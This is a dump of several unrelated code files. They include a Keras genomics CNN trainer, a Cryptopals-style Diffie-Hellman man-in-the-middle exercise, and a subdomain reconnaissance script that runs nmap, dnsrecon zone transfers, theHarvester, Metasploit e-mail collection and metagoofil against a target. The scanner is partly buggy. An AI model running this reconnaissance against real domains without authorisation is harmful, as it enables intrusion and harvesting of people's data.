kernel_regularizer=l2(0.001))\n use_bias=True)\n model.add(conv1_layer)\n model.add(MaxPooling1D(pool_size=4))\n model.add(Dropout(0.2))\n\n convn_layer = Conv1D(padding=\"valid\",\n activation=\"relu\",\n kernel_size=4,\n filters=500,\n use_bias=True, kernel_regularizer=l2(0.001))\n # use_bias=True)\n model.add(convn_layer)\n model.add(MaxPooling1D(pool_size=4))\n model.add(Dropout(0.2))\n\n convn_layer = Conv1D(padding=\"valid\",\n activation=\"relu\",\n kernel_size=4,\n filters=250,\n use_bias=True, kernel_regularizer=l2(0.001))\n # use_bias=True)\n model.add(convn_layer)\n model.add(MaxPooling1D(pool_size=4))\n model.add(Dropout(0.2))\n\n model.add(Flatten())\n model.add(Dense(units=numLabels, use_bias=True, kernel_regularizer=l2(0.001)))\n model.add(Activation('sigmoid'))\n return model\n\n# plot diagnostic learning curves\ndef summarize_diagnostics(history):\n gs = gridspec.GridSpec(3, 2)\n\n fig = pyplot.figure()\n # plot loss\n ax1=pyplot.subplot(gs[0, :])\n ax1.title.set_text('Cross Entropy Loss')\n ax1.plot(history.history['loss'], color='blue', label='train')\n ax1.plot(history.history['val_loss'], color='orange', label='test')\n ax1.set_yticks(np.arange(0, 1.2, step=0.2))\n\n\t# # plot fbeta\n # ax2 = pyplot.subplot(411)\n # ax2.title.set_text('Fbeta')\n # if extension!='single':\n # for i in range(8):\n # ax2.plot(f_globalArr[i], label='mine')\n # ax2.legend(\n # ['Progenitor','Dendritic','Monocyte','B cell','Basophil','NK cell','CD4+','CD8+'],loc='lower left', ncol=2)\n # # else:\n # # ax2.plot(f_globalArr[0], label='sklearn')\n # ax2.plot(history.history['fbeta'], color='blue', label='train')\n # ax2.plot(history.history['val_fbeta'], color='orange', label='test')\n # ax2.set_yticks(np.arange(0, 1.2, 
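# Hedged smoke test for get_model() above (argument values illustrative).
# Note that the layer stack is hard-coded, so numConvLayers/numConvFilters
# are currently accepted but unused by the function body.
model = get_model(numLabels=8, numConvLayers=3, numConvFilters=500,
                  poolingDropout=0.2, learningRate=0.01, momentum=0.9,
                  length=499)
model.summary()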
step=0.2))\n\n #plot accuracy\n ax3=pyplot.subplot(gs[1, :])\n ax3.title.set_text('Accuracy')\n if extension!='single':\n for i in range(8):\n ax3.plot(globalArr[i], label='mine')\n ax3.legend(['Progenitor','Dendritic','Monocyte','B cell','Basophil','NK cell','CD4+','CD8+'],loc='lower left', ncol=2)\n ax3.plot(history.history['accuracy'], label='train')\n ax3.plot(history.history['val_accuracy'], label='test')\n ax3.set_yticks(np.arange(0, 1.2, step=0.2))\n\n #Plot auroc\n ax4=pyplot.subplot(gs[2, 0])\n if extension!='single':\n for i in range(8):\n ax4.plot(roc_triplet[1][i],roc_triplet[2][i],label='ROC curve (area = %0.2f)' % roc_triplet[0][i])\n else:\n ax4.plot(roc_triplet[1][0],roc_triplet[2][0],label='ROC curve (area = %0.2f)' % roc_triplet[0][0])\n ax4.set_yticks(np.arange(0, 1.25, step=0.2))\n ax4.set_xticks(np.arange(0, 1.2, step=0.2))\n ax4.legend(loc=\"lower right\")\n\n #Plot auprc\n ax5=pyplot.subplot(gs[2, 1])\n if extension!='single':\n for i in range(8):\n ax5.plot(prc_triplet[1][i],prc_triplet[2][i],label='PRC curve (area = %0.2f)' % prc_triplet[0][i])\n else:\n ax5.plot(prc_triplet[1][0],prc_triplet[2][0],label='PRC curve (area = %0.2f)' % prc_triplet[0][0])\n ax5.set_yticks(np.arange(0, 1.25, step=0.2))\n ax5.set_xticks(np.arange(0, 1.2, step=0.2))\n ax5.legend(loc=\"lower right\")\n\n # save plot to file\n fig.tight_layout()\n fig.savefig('my_plot-new-' + extension+'.png')\n pyplot.close()\n\ndef train_model(modelOut,\n X_train,\n Y_train,\n X_valid,\n Y_valid,\n batchSize,\n numEpochs,\n numConvLayers,\n numConvFilters,\n poolingDropout,\n learningRate,\n momentum,\n length,\n pretrainedModel):\n\n # class_weights = calculating_class_weights(Y_train)\n # print(class_weights)\n\n # numLabels=1\n try:\n numLabels = Y_train.shape[1]\n except:\n numLabels= 1\n # X_train = np.reshape(X_train, (X_train.shape[0],1,X_train.shape[1],X_train.shape[2]))\n # X_valid = np.reshape(X_valid, (X_valid.shape[0],1,X_valid.shape[1],X_valid.shape[2]))\n if pretrainedModel:\n model = load_model(pretrainedModel)\n else:\n model = get_model(numLabels, numConvLayers, numConvFilters, poolingDropout, learningRate, momentum, length)\n optim = SGD(lr=learningRate, momentum=momentum)\n #'binary_crossentropy' get_weighted_loss(class_weights)\n model.compile(loss='binary_crossentropy', optimizer=optim, metrics=['accuracy'])#,fbeta]), ranking_loss]) #specificity_metric])\n model.summary()\n checkpointer = ModelCheckpoint(filepath=modelOut,\n verbose=1, save_best_only=True, monitor='val_loss', mode='min')\n earlystopper = EarlyStopping(patience=10, monitor='val_accuracy', min_delta=0, verbose=0, mode='max')\n print(X_valid.shape)\n print(Y_valid.shape)\n cust_metrics = Metrics()\n history = model.fit(x=X_train, y=Y_train, batch_size=batchSize, epochs=numEpochs, shuffle=True, verbose=1,\n validation_data = (X_valid, Y_valid), initial_epoch=0, callbacks=[checkpointer,cust_metrics, earlystopper])#, class_weight = classWeights)\n # from skmultilearn.problem_transform import BinaryRelevance\n # from skmultilearn.ext import Keras\n # KERAS_PARAMS = dict(batch_size=batchSize, epochs=numEpochs, shuffle=True, verbose=1,\n # validation_data = (X_valid, Y_valid), initial_epoch=0, callbacks=[checkpointer,cust_metrics])\n # clf = BinaryRelevance(classifier=Keras(model, False, KERAS_PARAMS), require_dense=[False,True])\n # history = clf.fit(X_train, Y_train)\n # learning curves\n summarize_diagnostics(history)\n\ndef my_fbeta(y_true, y_pred):\n return fbeta_score(y_true, y_pred,2)\n\nif __name__==\"__main__\":\n 
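# Hedged note on my_fbeta() above: recent scikit-learn releases make beta
# keyword-only, so the explicit-keyword spelling below is the safer variant
# when scoring one binary label column at a time.
from sklearn.metrics import fbeta_score

def my_fbeta_kw(y_true, y_pred):
    return fbeta_score(y_true, y_pred, beta=2, average='binary')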
parser = argparse.ArgumentParser(description='Train a convolutional neural networnp model', fromfile_prefix_chars='@')\n parser.add_argument('-xt', '--xtrain', help='npy file containing training data', required=True)\n parser.add_argument('-yt', '--ytrain', help='npy file containing training labels', required=True)\n parser.add_argument('-xv', '--xvalid', help='npy file containing validation data', required=True)\n parser.add_argument('-yv', '--yvalid', help='npy file containing validation labels', required=True)\n parser.add_argument('-o', '--model-out', help='hdf5 file path for output', required=True)\n parser.add_argument('-b', '--batch-size', type=int, help='mini-batch size for training', required=False, default=100)\n parser.add_argument('-e', '--num-epochs', type=int, help='number of epochs to train', required=False, default=50)\n parser.add_argument('-n', '--num-conv-layers', type=int, help='number of convolutional layers to use', required=False, default=2)\n parser.add_argument('-c', '--num-conv-filters', type=int, help='number of convolutional filters to use in layers after the first one', required=False, default=100)\n parser.add_argument('-pdrop', '--pool-dropout-rate', type=float, help='dropout rate for pooling layer', required=False, default=0.2)\n parser.add_argument('-lr', '--learning-rate', type=float, help='learning rate for sgd optimizer', required=False, default=0.01)\n parser.add_argument('-m', '--momentum', type=float, help='momentum for sgd', required=False, default=0.9)\n parser.add_argument('-l', '--length', type=int, help='length of input nucleotide sequences', required=False, default=499)\n parser.add_argument('-w', '--pretrained-model', help='path to hdf5 file containing pretrained model', required=False, default=None)\n parser.add_argument('-c1w', '--class-1-weight', type=int, help='weight for positive class during training', required=False, default=1)\n parser.add_argument('-c2w', '--class-2-weight', type=int, help='weight for positive class during training', required=False, default=1)\n args = parser.parse_args()\n print(\"Loading data\")\n X_train = np.load(file=args.xtrain)\n Y_train = np.load(file=args.ytrain)\n\n X_valid = np.load(file=args.xvalid)\n Y_valid = np.load(file=args.yvalid)\n\n # Note no. 
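# Hedged example invocation of this training script (file paths illustrative):
#   python cnn.py -xt X_train.npy -yt Y_train.npy \
#                 -xv X_valid.npy -yv Y_valid.npy \
#                 -o model.hdf5 -e 50 -b 100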
of samples will be doubled from output of standardizepeaks\n # because of reverse complements\n print(\"Training on: \"+ str(X_train.shape[0]))\n print(\"Validating on: \" + str(X_valid.shape[0]))\n\n # if extension=='single':\n # print(\"Extracting 1 label\")\n # Y_train = Y_train[:,1]\n # Y_valid = Y_valid[:,1]\n\n #\n print('Model state:')\n print('LR='+str(args.learning_rate)+'\\nMomentum='+str(args.momentum))\n #\n #train SVM models\n #use gkm-svm : lsgkm\n # ''' To generate fasta files use:\n # sed '/^chr8/ d' combined.bed | sed '/^chr9/ d' | sed '/^chr4/ d' > training.bed\n # ./bedtools getfasta -fi hg38.fa -bed diff_acess/negSet-2.bed -fo diff_acess/negSet.fa\n # ./bedtools getfasta -fi hg38.fa -bed diff_acess/training.bed -fo diff_acess/posSet.fa '''\n # print(\"Training SVM model\")\n # os.system('/home/snigdhaa/lsgkm/src/gkmtrain -T 16 -s /home/snigdhaa/diff_acess/svmData/prom2pos.fa /home/snigdhaa/diff_acess/svmData/prom2neg.fa svmModel-short')\n\n print(Y_valid.shape)\n test_yhat = asarray([np.zeros(Y_valid.shape[1]) for _ in range(Y_valid.shape[0])])\n print(measure_per_label(skm.accuracy_score, scipy.sparse.csr_matrix(Y_valid),scipy.sparse.csr_matrix(test_yhat)))\n m = tf.keras.metrics.Accuracy()\n _ = m.update_state(Y_valid,test_yhat)\n print(m.result().numpy() )\n\n #Check baseline auroc and auprc for single label\n prec, recall, _ = precision_recall_curve(Y_valid, test_yhat)\n prc_auc = auc(recall, prec)\n print(\"Baseline prc:\"+str(prc_auc))\n\n fpr, tpr, _ = roc_curve(Y_valid, test_yhat)\n roc_auc = auc(fpr, tpr)\n print(\"Baseline roc:\"+str(roc_auc))\n\n train_model(modelOut=args.model_out,\n X_train=X_train,\n Y_train=Y_train,\n X_valid=X_valid,\n Y_valid=Y_valid,\n batchSize=args.batch_size,\n numEpochs=args.num_epochs,\n numConvLayers=args.num_conv_layers,\n numConvFilters=args.num_conv_filters,\n poolingDropout=args.pool_dropout_rate,\n learningRate=args.learning_rate,\n momentum=args.momentum,\n length=args.length,\n pretrainedModel=args.pretrained_model)\n print('Highest accuracy: '+str(highest_accuracy))\n\n model = load_model('output-newDrop.hdf5')\n predValid = model.predict_proba(X_valid)\n pred_binary = K.round(predValid)\n fpr = dict()\n tpr = dict()\n roc_auc = dict()\n for i in range(Y_valid.shape[1]):\n fpr[i], tpr[i], _ = roc_curve(Y_valid[:, i], pred_binary[:, i])\n roc_auc[i] = auc(fpr[i], tpr[i])\n roc_triplet = (roc_auc,fpr,tpr)\n\n prec = dict()\n recall = dict()\n prc_auc = dict()\n for i in range(Y_valid.shape[1]):\n prec[i], recall[i], _ = precision_recall_curve(Y_valid[:, i], pred_binary[:, i])\n prc_auc[i] = auc(recall[i], prec[i])\n prc_triplet = (prc_auc,recall,prec)\n\n gs = gridspec.GridSpec(1, 2)\n\n fig = pyplot.figure()\n #Plot auroc\n ax4=pyplot.subplot(gs[0, 0])\n if extension!='single':\n for i in range(8):\n ax4.plot(roc_triplet[1][i],roc_triplet[2][i],label='ROC curve (area = %0.2f)' % roc_triplet[0][i])\n else:\n ax4.plot(roc_triplet[1][0],roc_triplet[2][0],label='ROC curve (area = %0.2f)' % roc_triplet[0][0])\n ax4.set_yticks(np.arange(0, 1.25, step=0.2))\n ax4.set_xticks(np.arange(0, 1.2, step=0.2))\n ax4.legend(loc=\"lower right\")\n\n #Plot auprc\n ax5=pyplot.subplot(gs[0, 1])\n if extension!='single':\n for i in range(8):\n ax5.plot(prc_triplet[1][i],prc_triplet[2][i],label='PRC curve (area = %0.2f)' % prc_triplet[0][i])\n else:\n ax5.plot(prc_triplet[1][0],prc_triplet[2][0],label='PRC curve (area = %0.2f)' % prc_triplet[0][0])\n ax5.set_yticks(np.arange(0, 1.25, step=0.2))\n ax5.set_xticks(np.arange(0, 1.2, step=0.2))\n 
ax5.legend(loc=\"lower right\")\n fig.tight_layout()\n fig.savefig('auc_plot-new-' + extension+'.png')\n pyplot.close()\n","sub_path":"cnn.py","file_name":"cnn.py","file_ext":"py","file_size_in_byte":17135,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"548938757","text":"#!/usr/bin/env python3\n\nfrom hashlib import sha1\nimport os\nimport secrets\n\nfrom Cryptodome.Cipher import AES\n\nimport s5c33\nimport utils\n\n# NIST params\np, g = s5c33.to_int(\"\"\"\nffffffffffffffffc90fdaa22168c234c4c6628b80dc1cd129024\ne088a67cc74020bbea63b139b22514a08798e3404ddef9519b3cd\n3a431b302b0a6df25f14374fe1356d6d51c245e485b576625e7ec\n6f44c42e9a637ed6b0bff5cb6f406b7edee386bfb5a899fa5ae9f\n24117c4b1fe649286651ece45b3dc2007cb8a163bf0598da48361\nc55d39a69163fa8fd24cf5f83655d23dca3ad961c62f356208552\nbb9ed529077096966d670c354e4abc9804f1746c08ca237327fff\nfffffffffffff\n\"\"\"), 2\n\n\ndef gen_keypair(p, g):\n \"\"\"Generate a keypair using `p`, `g`.\"\"\"\n a = secrets.randbelow(p)\n A = pow(g, a, p)\n return a, A\n\n\ndef derive_aes_key(s: int) -> bytes:\n \"\"\"Derive an AES-128 key from a shared secret: SHA1(SECRET)[0:16].\"\"\"\n # The shared secrets are 192 bytes long, or 384 hex-digits.\n return sha1(bytes.fromhex(f'{s:0384x}')).digest()[:16]\n\n\ndef encrypt(k: bytes, pt: bytes, iv: bytes) -> bytes:\n \"\"\"AES-128-CBC encrypt; prepended IV.\"\"\"\n return iv + AES.new(k, AES.MODE_CBC, iv).encrypt(utils.pad_pkcs7(pt, 16))\n\n\ndef decrypt(k: bytes, ct: bytes, iv: bytes) -> bytes:\n \"\"\"AES-128-CBC decrypt; prepended IV.\"\"\"\n return utils.unpad_pkcs7(AES.new(k, AES.MODE_CBC, iv).decrypt(ct), 16)\n\n\ndef protocol_demo():\n \"\"\"Demo the challenge's DH protocol.\"\"\"\n # Alice shares the DH params (p, g).\n # - Alice sends \"p\", \"g\" to Bob\n\n # Both sides generate keypairs.\n a, A = gen_keypair(p, g)\n b, B = gen_keypair(p, g)\n\n # Both sides share public keys (A, B).\n # - Alice sends \"A\" to Bob\n # - Bob sends \"B\" to Alice\n\n # Both sides calculate the same secret.\n sA = pow(B, a, p)\n sB = pow(A, b, p)\n assert sA == sB\n\n # Both sides derive the same key.\n kA = derive_aes_key(sA)\n kB = derive_aes_key(sB)\n assert kA == kB\n\n # Alice encrypts a message under AES-128-CBC.\n ptA = b'Hi, this is Alice!'\n ivA = os.urandom(16)\n ctA = encrypt(kA, ptA, ivA)\n\n # Bob encrypts a message under AES-128-CBC.\n ptB = b'Hi, this is Bob!'\n ivB = os.urandom(16)\n ctB = encrypt(kB, ptB, ivB)\n\n # Alice and Bob exchange some encrypted messages.\n # - Alice sends `ctA` to Bob\n # - Bob sends `ctB` to Bob\n\n # Both sides decrypt an incoming message under AES-128-CBC.\n ptA_recv = decrypt(kB, ctA[16:], ctA[:16])\n ptB_recv = decrypt(kA, ctB[16:], ctB[:16])\n assert ptA_recv == ptA\n assert ptB_recv == ptB\n\n\ndef protocol_mitm():\n \"\"\"MITM the challenge's protocol.\"\"\"\n # Alice shares the DH params (p, g).\n # - Alice sends \"p\", \"g\" to Bob\n\n # Both sides generate keypairs.\n a, A = gen_keypair(p, g)\n b, B = gen_keypair(p, g)\n\n # Both sides attempt to share public keys (A, B).\n # However, Michael replaces each public key with \"p\".\n\n # Both sides calculate the same secret.\n # However, Michael has forced the secret to equal zero!\n sA = pow(p, a, p)\n sB = pow(p, b, p)\n assert sA == sB == 0\n\n # Both sides derive the same key.\n kA = derive_aes_key(sA)\n kB = derive_aes_key(sB)\n assert kA == kB\n\n # Alice encrypts a message under AES-128-CBC.\n ptA = b'Hi, this is Alice!'\n ivA = os.urandom(16)\n ctA = encrypt(kA, 
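# Hedged check of the key Michael recovers in protocol_mitm(): with both
# public keys replaced by p, the shared secret is 0, so the AES key is fixed
# to SHA1 over 192 zero bytes (the 384-hex-digit encoding of 0).
from hashlib import sha1
mitm_key = sha1(bytes.fromhex('%0384x' % 0)).digest()[:16]
assert mitm_key == derive_aes_key(0)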
ptA, ivA)\n\n    # Bob encrypts a message under AES-128-CBC.\n    ptB = b'Hi, this is Bob!'\n    ivB = os.urandom(16)\n    ctB = encrypt(kB, ptB, ivB)\n\n    # Alice and Bob exchange some encrypted messages.\n    # However, Michael intercepts and forwards them.\n    # - Alice sends `ctA` to Bob, through Michael\n    # - Bob sends `ctB` to Alice, through Michael\n\n    # Both sides decrypt an incoming message under AES-128-CBC.\n    ptA_recv = decrypt(kB, ctA[16:], ctA[:16])\n    ptB_recv = decrypt(kA, ctB[16:], ctB[:16])\n    assert ptA_recv == ptA\n    assert ptB_recv == ptB\n\n    # Since Michael knows the shared secret is 0, he can decrypt both messages.\n    kM = derive_aes_key(0)\n    ptA_via_M = decrypt(kM, ctA[16:], ctA[:16])\n    ptB_via_M = decrypt(kM, ctB[16:], ctB[:16])\n    assert ptA_via_M == ptA\n    assert ptB_via_M == ptB\n\n\nif __name__ == '__main__':\n    protocol_demo()\n    protocol_mitm()\n    print('success')\n","sub_path":"s5c34.py","file_name":"s5c34.py","file_ext":"py","file_size_in_byte":4164,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"392590170","text":"from aiida.orm import KpointsData, StructureData, Float\nfrom aiida.engine import calcfunction\n\n@calcfunction\ndef get_kpoints_mesh_from_structure(structure: StructureData,\n                                    kpoints_distance: Float) -> KpointsData:\n    kpoints_data = KpointsData()\n    kpoints_data.set_cell_from_structure(structure)\n    kpoints_data.set_kpoints_mesh_from_density(kpoints_distance.value)\n\n    return kpoints_data","sub_path":"aiida_quantumespresso_elastic/utils/get_kpoints_mesh_from_structure.py","file_name":"get_kpoints_mesh_from_structure.py","file_ext":"py","file_size_in_byte":428,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"320191804","text":"#!/usr/bin/python3\n\n# Automatic enumeration tool by Max Spitzlay\n \n# Imports\nimport sys # system utilities\nimport os # OS commands\nimport time # sleep between steps\n#import subprocess # for reading out results\nfrom datetime import datetime # current date\nimport socket # socket operations\n#import getopt # getopt for command-line arguments\nimport argparse # argparse for options such as -o and -d\n#import itertools # animations\n#import threading # animations\nimport colors as co # colors.py module for colored output\n#import animate as an # animate.py for animations\n#import webscraping\n#from webscraping import download\nimport random\nfrom spenum import *\n\n\n# The classes below scan individual subdomains.\n\n# Subdomain number:\n# sed -n [x]p Eye.txt  // prints line number x of the file\n# subnr = index of the subdomain currently being scanned\n\n# Get IP\nclass sub_ip:\n    def sub_ip(self):\n        time.sleep(float(sleeper))\n        co.printout (\"\\n\\nGetting IP-Address ... \\n\", BLUE)\n        co.printout (\"\\n--- --- ---Tool: host \\n\", GREEN)\n        current_subdomain_ip = socket.gethostbyname(current_subdomain_address)\n        file.write(\"The IP address of the website is: \" + current_subdomain_ip + \"\\nThe IPv6 address is: \")\n        file.close() #close the file\n        os.system(\"host %s | awk '/IPv6/{print >> \\\"./Enumerationen/%s/%s\\\";}1'\" % (current_subdomain_address, domain, current_subdomain_address))\n        os.system(\"host %s\" % current_subdomain_address)\n        file = open('./Enumerationen/%s/%s' % (domain, current_subdomain_address), 'a') #open it again\n        file.write(\"\\n \\n\")\n        time.sleep(float(sleeper))\n\nsub_ip = sub_ip()\n\n \nclass sub_mailserver:\n    def sub_mailserver(self):\n        co.printout (\"\\n\\nGetting Mailserver... 
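# Hedged corrected sketch for the report-file handling in the sub_* classes
# above and below: they call file.write()/file.close() and then rebind
# file = open(...), which makes `file` function-local and raises
# UnboundLocalError on the first write. Declaring the shared handle global
# (assuming spenum provides it at module level) avoids that.
def reopen_report(path):
    global file
    file.close()
    file = open(path, 'a')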
\\n\", BLUE)\n co.printout (\"\\n--- --- ---Tool: dig\", GREEN)\n time.sleep(float(sleeper))\n file.write(\"Mailserver: \\n \\n\")\n file.close() #close the file\n os.system(\"dig\" + \" \" + current_subdomain_address + \" MX | awk '/MX/{print >> \\\"./Enumerationen/%s/%s\\\";}1'\" % (domain, current_subdomain_address))\n file = open('./Enumerationen/%s/%s' % (domain, current_subdomain_address), 'a') #open it again\n file.write(\"\\n \\n\")\n time.sleep(float(sleeper))\n\nsub_mailserver = sub_mailserver()\n\nclass sub_portscan:\n def sub_portscan(self):\n co.printout (\"\\n\\nScanning for open ports... \\n\", BLUE)\n co.printout (\"\\n--- --- ---Tool: nmap \\n\", GREEN)\n time.sleep(float(sleeper))\n file.write(\"Open Ports: \\n \\n\")\n file.close() #close the file\n os.system(\"nmap -p -5000 %s | awk '/Host/,0{print >>\\\"./Enumerationen/%s/%s\\\";}1'\" % (current_subdomain_ip, domain, current_subdomain_address))\n file = open('./Enumerationen/%s/%s' % (domain, current_subdomain_address), 'a') #open it again\n file.write(\"\\n \\n\")\n time.sleep(float(sleeper))\n\nsub_portscan = sub_portscan()\n\nclass sub_nameserver:\n def sub_nameserver(self):\n co.printout (\"\\nGetting Nameserver... \\n\", BLUE)\n co.printout (\"\\n--- --- ---Tool: dig\", GREEN)\n time.sleep(float(sleeper))\n file.write(\"Nameserver: \\n \\n\")\n file.close() #close the file\n os.system(\"dig %s ns | awk '/ns/{print >>\\\"./Enumerationen/%s/%s\\\";}1'\" % (current_subdomain_address, domain, domain, current_subdomain_address))\n file = open('./Enumerationen/%s/%s' % (domain, current_subdomain_address), 'a') #open it again\n file.write(\"\\n \\n\")\n time.sleep(float(sleeper))\n\nsub_nameserver = sub_nameserver()\n\nclass sub_transfer:\n def sub_transfer(self):\n file.write(\"\\nZone-Transfer: \\n \\n\")\n co.printout (\"\\nAttempting Zone Transfer... \\n\", BLUE)\n co.printout (\"\\n--- --- ---Tool: dnsrecon \\n\", GREEN)\n time.sleep(float(sleeper)) #Sleeper\n file.close() #close the file\n os.system(\"dnsrecon -d %s -a | awk '/Performing/,0{print >>\\\"./Enumerationen/%s/%s\\\";}1'\" % (current_subdomain_address, domain, current_subdomain_address))\n file = open('./Enumerationen/%s/%s' % (domain, current_subdomain_address), 'a') #open it again\n file.write(\"\\n \\n\")\n time.sleep(float(sleeper))\n\nsub_transfer = sub_transfer()\n\nclass sub_range:\n def sub_range(self):\n file.write(\"IP-Range: \")\n co.printout (\"\\n\\nGetting IP Range... \\n\", BLUE)\n co.printout (\"\\n--- --- ---Tool: whois -B \\n\", GREEN)\n time.sleep(float(sleeper)) #Sleeper\n file.close() #close the file\n reichweite = os.system(\"whois -B %s | grep 'inetnum' | sed 's/inetnum: //g' | sed 's/ //g'\" % current_subdomain_ip) #filter IP Range out\n os.system(\"whois -B %s | grep 'inetnum' | sed 's/inetnum: //g' | sed 's/ //g' >> ./Enumerationen/%s/%s\" % (current_subdomain_ip, domain, current_subdomain_address))\n file = open('./Enumerationen/%s/%s' % (domain, current_subdomain_address), 'a') #open it again\n file.write(\"\\n \\n\")\n time.sleep(float(sleeper))\n\nsub_range = sub_range()\n\nclass sub_ssl:\n def sub_ssl(self):\n file.write(\"\\n \\nSSL-Scan Results: \\n \\n\")\n co.printout (\"\\n\\nRunning SSL-Scan... 
\\n\", BLUE)\n co.printout (\"\\n--- --- ---Tool: sslscan \\n\", GREEN)\n time.sleep(float(sleeper)) #Sleeper\n file.close() #close the file\n os.system(\"sslscan --no-colour %s | awk '/OpenSSL/,0{print >>\\\"./Enumerationen/%s/%s\\\";}1'\" % (current_subdomain_address, domain, current_subdomain_address)) #Dirty Fix, da er sich erste Line pickt und dann followt\n file = open('./Enumerationen/%s/%s' % (domain, current_subdomain_address), 'a') #open it again\n file.write(\"\\n \\n\")\n time.sleep(float(sleeper))\n time.sleep(float(sleeper))\n\nsub_ssl = sub_ssl()\n\nclass sub_lbd:\n def sub_lbd(self):\n file.write(\"Loadbalancing: \\n \\n\")\n co.printout (\"\\n\\nTesting for loadbalancing... \\n\", BLUE)\n co.printout (\"\\n--- --- ---Tool: lbd\", GREEN)\n time.sleep(float(sleeper)) #Sleeper\n file.close() #close the file\n os.system(\"lbd %s | awk '/use Load-balancing/{print >>\\\"./Enumerationen/%s/%s\\\";}1'\" % (current_subdomain_address, domain, current_subdomain_address))\n file = open('./Enumerationen/%s/%s' % (domain, current_subdomain_address), 'a') #open it again\n file.write(\"\\n \\n\")\n time.sleep(float(sleeper))\n\nsub_lbd = sub_lbd()\n\nclass sub_harvester:\n def sub_harvester(self):\n file.write(\"Harvested Emails: \\n \\n\")\n co.printout (\"\\n\\nHarvesting E-Mails... \\n\", BLUE)\n co.printout (\"\\n--- --- ---Tool: theharvester\", GREEN)\n time.sleep(float(sleeper)) #Sleeper\n file.close() #close the file\n os.system(\"theharvester -d %s -b google | awk '/%s/{print >>\\\"./Enumerationen/%s/%s\\\";}1'\" % (current_subdomain_address, current_subdomain_address, domain, current_subdomain_address)) #Sollte funktionieren mit @domain, muss getestet werden.\n file = open('./Enumerationen/%s/%s' % (domain, current_subdomain_address), 'a') #open it again\n file.write(\"\\n \\n\")\n time.sleep(float(sleeper))\n\nsub_harvester = sub_harvester()\n\nclass sub_metasploit:\n def sub_metasploit(self):\n co.printout (\"\\nHarvesting more E-Mails...\", BLUE)\n co.printout (\"\\n--- --- ---Tool: Metasploit / MSFConsole \\n\", GREEN)\n \n os.system(\"rm -rf metasploit-script/\") #To delete potential before-script\n os.system(\"mkdir metasploit-script\")\n os.system(\"touch ./metasploit-script/sploiter.rc\")\n os.system(\"echo use auxiliary/gather/search_email_collector > ./metasploit-script/sploiter.rc\")\n os.system(\"echo set domain %s >> ./metasploit-script/sploiter.rc\" % current_subdomain_address)\n os.system(\"echo run >> ./metasploit-script/sploiter.rc\")\n os.system(\"echo exit >> ./metasploit-script/sploiter.rc\")\n os.system(\"msfconsole -r ./metasploit-script/sploiter.rc | awk '/%s/{print >>\\\"./Enumerationen/%s/%s\\\";}1'\" % (current_subdomain_address, domain, current_subdomain_address))\n os.system(\"rm -rf metasploit-script/\") #To delete script after\n\nsub_metasploit = sub_metasploit\n\nclass sub_metagoofil:\n def sub_metagoofil(self):\n co.printout (\"\\n\\Harvesting Public Files and Information... 
\\n\", BLUE)\n co.printout (\"\\n--- --- ---Tool: Metagoofil \\n\", GREEN)\n time.sleep(float(sleeper))\n pwd = os.system(\"pwd\") #Current Location\n os.system(\"metagoofil -d %s -t pdf -l 100 -n 25 -o %s -f ./Enumerationen/%s/subdomains/enumpdf%s.html\" % (current_subdomain_address, pwd, domain, current_subdomain_id))\n time.sleep(float(sleeper))\n\nsub_metagoofil = sub_metagoofil()\n\n\n","sub_path":"subdomainscanner_old.py","file_name":"subdomainscanner_old.py","file_ext":"py","file_size_in_byte":8648,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"147620347","text":"#(4) example04\n#import tensorflow and numpy\nimport tensorflow as tf\nimport numpy as np\n\n#[feather, wing]\nx_data = np.array(\n [[0, 0], [1, 0], [1, 1], [0, 0], [0, 0], [0, 1]])\n\n#[etc, mammal, bird]\n#one-hot encoding(label)\ny_data = np.array([\n [1, 0, 0], #etc\n [0, 1, 0], #mammal\n [0, 0, 1], #bird\n [1, 0, 0],\n [1, 0, 0],\n [0, 0, 1]\n])\n\n#make simple model\n#make placeholder\nX = tf.placeholder(tf.float32)\nY = tf.placeholder(tf.float32)\n\n#input size is 2, output size is 3\nweight1 = tf.Variable(tf.random_uniform([2, 10], -1., 1.))\nweight2 = tf.Variable(tf.random_uniform([10, 3], -1., 1.))\n\nbias1 = tf.Variable(tf.zeros([10]))\nbias2 = tf.Variable(tf.zeros([3]))\n\n#activation function\nlayer1 = tf.add(tf.matmul(X, weight1), bias1)\nlayer2 = tf.nn.relu(layer1)\n\nmodel = tf.add(tf.matmul(layer1, weight2), bias2)\n\ncost = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits_v2(labels=Y, logits=model))\n\noptimizer = tf.train.AdamOptimizer(learning_rate=0.01)\ntrain_op = optimizer.minimize(cost)\n\n#training\ninit = tf.global_variables_initializer()\nsess = tf.Session()\nsess.run(init)\n\nfor step in range(100):\n sess.run(train_op, feed_dict={X: x_data, Y: y_data})\n if (step + 1) % 10 == 0:\n print(step + 1, sess.run(cost, feed_dict={X: x_data, Y: y_data}))\nprediction = tf.argmax(model, 1)\nground_truth = tf.argmax(Y, 1)\nprint('Prediction:', sess.run(prediction, feed_dict={X: x_data}))\nprint('Ground Truth:', sess.run(ground_truth, feed_dict={Y: y_data}))\n\nis_correct = tf.equal(prediction, ground_truth)\naccuracy = tf.reduce_mean(tf.cast(is_correct, tf.float32))\nprint('Accuracy: %.2f' % sess.run(accuracy * 100, feed_dict={X: x_data, Y: y_data}))","sub_path":"tensorflow/example04.py","file_name":"example04.py","file_ext":"py","file_size_in_byte":1679,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"343440081","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\n# Python \n#Photoelectric effect- Calculation of WorkFunction\n#Error Calculation from Theoretical and Calculated Value\n# Amrutha V-lab Simulation Result\n \n#PLATINUM #PLATINUM #PLATINUM #PLATINUM #PLATINUM #PLATINUM \n \n#Variable declaration\n\n\ne = 1.6e-19; # Charge on an electron, C\nh = 6.626e-34; # Planck's constant, Js\nc = 3.0e+08; # Speed of light in vacuum, m/s\nW_Theo = 6.35; # Theoretical Value of Work Function of Pt in eV\nlamb = float(input(\"Enter the Wavelenghth (in meter) :\")); # Wavelength of incident light (meter)\nV_0 = float(input(\"Enter the Stopping potential (-ve) :\" )); # Stopping potential for emitted electrons, V \n\n\n#Calculation\n\nf = c/lamb; # Frequency of incident 